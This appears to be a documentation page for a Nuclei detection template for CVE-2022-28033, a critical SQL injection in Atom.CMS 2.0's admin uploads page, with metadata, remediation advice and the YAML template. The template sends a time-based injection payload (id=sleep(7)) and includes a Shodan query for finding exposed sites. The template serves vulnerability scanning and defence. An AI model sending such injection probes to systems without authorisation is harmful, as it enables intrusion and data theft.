Atom.CMS 2.0 - SQL Injection
ID: CVE-2022-28033
Severity: critical
Author: ritikchaddha
Tags: cve,cve2022,atom,cms,sqli
Description
Section titled “Description”Atom.CMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_uploads.php which allows an attacker to execute arbitrary SQL commands.
YAML Source
Section titled “YAML Source”id: CVE-2022-28033
info: name: Atom.CMS 2.0 - SQL Injection author: ritikchaddha severity: critical description: | Atom.CMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_uploads.php which allows an attacker to execute arbitrary SQL commands. impact: | Successful exploitation could lead to unauthorized access, data leakage, and potential data manipulation. remediation: | Apply the latest security patches provided by the vendor to mitigate the SQL Injection vulnerability in Atom.CMS 2.0. reference: - https://github.com/thedigicraft/Atom.CMS/issues/259 - https://nvd.nist.gov/vuln/detail/CVE-2022-28033 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-28033 cwe-id: CWE-89 epss-score: 0.00172 epss-percentile: 0.53749 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: thedigitalcraft product: atomcms shodan-query: html:"atomcms" tags: cve,cve2022,atom,cms,sqli
flow: http(1) && http(2)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(tolower(body), "atomcms")' internal: true
- raw: - | @timeout: 20s GET /admin/uploads.php?id=sleep(7) HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'duration>=7' - 'contains(body, "WHERE id")' - 'status_code == 200' condition: and# digest: 490a0046304402201ab3cf280a270c2430f485ec9584f2b09d27229fbaa448680ce2f8a79413a306022017553dcf3c8b36a707cff7d500c7fb276d742aafa372774a4d6165ab68d9149d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-28033.yaml"